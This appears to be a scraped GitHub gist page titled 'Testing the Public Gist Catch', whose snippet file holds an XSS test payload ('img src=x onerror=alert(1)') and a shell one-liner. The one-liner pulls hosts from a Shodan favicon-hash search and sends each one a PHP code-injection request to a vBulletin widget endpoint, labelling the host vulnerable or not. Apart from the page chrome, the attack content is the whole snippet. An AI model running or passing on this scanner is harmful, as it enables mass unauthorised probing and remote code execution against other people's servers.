Skip to content

Instantly share code, notes, and snippets.

View sherlocksecurity's full-sized avatar
:octocat:
Hacking

Sherlock Secure sherlocksecurity

:octocat:
Hacking
View GitHub Profile
Testing the Public Gist Catch
Does editing catch it?
https://gist.githubusercontent.com/sherlocksecurity/e18c8a15e938fd753f28df14f697afef/raw/97ac59fc74bbd41e7030a8b45618cb2fba8174f7/msk-snippet-My%20snippet.json
@sherlocksecurity
sherlocksecurity / msk-snippet-My snippet.json
Created February 18, 2021 08:49
“><img src=x onerror=alert(1)>
{"bugs"}
“><img src=x onerror=alert(1)>
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;